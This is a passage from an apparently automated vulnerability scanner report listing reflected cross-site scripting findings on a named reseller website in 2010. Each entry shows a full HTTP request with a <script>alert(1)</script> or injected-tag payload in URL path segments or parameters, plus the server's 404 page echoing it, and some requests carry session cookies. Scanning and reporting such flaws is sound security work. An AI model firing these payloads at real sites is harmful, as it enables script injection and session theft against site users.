<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3e50f<script>alert(1)</script>c24f9ba5ae/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3151. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 898e2<script>alert(1)</script>9ee2f98beaa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44898e2<script>alert(1)</script>9ee2f98beaa/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44898e2<script>alert(1)</script>9ee2f98beaa/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3152. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9f9e6<script>alert(1)</script>b244ace9e69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes9f9e6<script>alert(1)</script>b244ace9e69/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes9f9e6<script>alert(1)</script>b244ace9e69/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3153. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 601be<script>alert(1)</script>f1fbb146bd5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos601be<script>alert(1)</script>f1fbb146bd5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos601be<script>alert(1)</script>f1fbb146bd5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3154. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a25d3<script>alert(1)</script>be23dc94ff5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/search.phpa25d3<script>alert(1)</script>be23dc94ff5?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/search.phpa25d3<script>alert(1)</script>be23dc94ff5?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3155. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8130c<a>ef9af945079 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search8130c<a>ef9af945079&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search8130c<a>ef9af945079&opt=2 was not found on this server.</p>
...[SNIP]...

2.3156. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6d896<a>1b63a3c3cdf was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/search.php?keyword=search...6d896<a>1b63a3c3cdf&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/search.php?keyword=search...6d896<a>1b63a3c3cdf&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3157. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cc837<script>alert(1)</script>8ce30157717 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&cc837<script>alert(1)</script>8ce30157717=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&cc837<script>alert(1)</script>8ce30157717=1 was not found on this server.</p>
...[SNIP]...

2.3158. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 27c45<a>284114a16f1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=227c45<a>284114a16f1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=227c45<a>284114a16f1 was not found on this server.</p>
...[SNIP]...

2.3159. http://www.resellerbase.com/detail/44/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8720<script>alert(1)</script>2b55cc36b9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile8720<script>alert(1)</script>2b55cc36b9d/44/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile8720<script>alert(1)</script>2b55cc36b9d/44/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3160. http://www.resellerbase.com/detail/44/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 424be<script>alert(1)</script>5b653e333e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44424be<script>alert(1)</script>5b653e333e9/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44424be<script>alert(1)</script>5b653e333e9/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3161. http://www.resellerbase.com/detail/44/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7fe78<script>alert(1)</script>a807717cd4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes7fe78<script>alert(1)</script>a807717cd4c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes7fe78<script>alert(1)</script>a807717cd4c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3162. http://www.resellerbase.com/detail/44/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 306c2<script>alert(1)</script>bf8417192ad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/search.php306c2<script>alert(1)</script>bf8417192ad?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/search.php306c2<script>alert(1)</script>bf8417192ad?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3163. http://www.resellerbase.com/detail/44/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d84b2<a>c811f1e5cbe was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/search.php?keyword=search...&Submit3=Searchd84b2<a>c811f1e5cbe&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/search.php?keyword=search...&Submit3=Searchd84b2<a>c811f1e5cbe&opt=2 was not found on this server.</p>
...[SNIP]...

2.3164. http://www.resellerbase.com/detail/44/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a07de<a>5de06d86252 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/search.php?keyword=search...a07de<a>5de06d86252&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/search.php?keyword=search...a07de<a>5de06d86252&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3165. http://www.resellerbase.com/detail/44/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3afe7<script>alert(1)</script>75e451d395d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/search.php?keyword=search...&Submit3=Search&opt=2&3afe7<script>alert(1)</script>75e451d395d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/search.php?keyword=search...&Submit3=Search&opt=2&3afe7<script>alert(1)</script>75e451d395d=1 was not found on this server.</p>
...[SNIP]...

2.3166. http://www.resellerbase.com/detail/44/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload fe502<a>d49b7bb9fe8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/search.php?keyword=search...&Submit3=Search&opt=2fe502<a>d49b7bb9fe8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/search.php?keyword=search...&Submit3=Search&opt=2fe502<a>d49b7bb9fe8 was not found on this server.</p>
...[SNIP]...

2.3167. http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/white-label-seo-resellers-search-engine-optimisation.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 774f8<script>alert(1)</script>34f83a8a183 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail774f8<script>alert(1)</script>34f83a8a183/44/white-label-seo-resellers-search-engine-optimisation.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail774f8<script>alert(1)</script>34f83a8a183/44/white-label-seo-resellers-search-engine-optimisation.html was not found on this server.</p>
...[SNIP]...

2.3168. http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/white-label-seo-resellers-search-engine-optimisation.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4c1b3<a>68fae54af39 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/444c1b3<a>68fae54af39/white-label-seo-resellers-search-engine-optimisation.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/444c1b3<a>68fae54af39/white-label-seo-resellers-search-engine-optimisation.html was not found on this server.</p>
...[SNIP]...

2.3169. http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
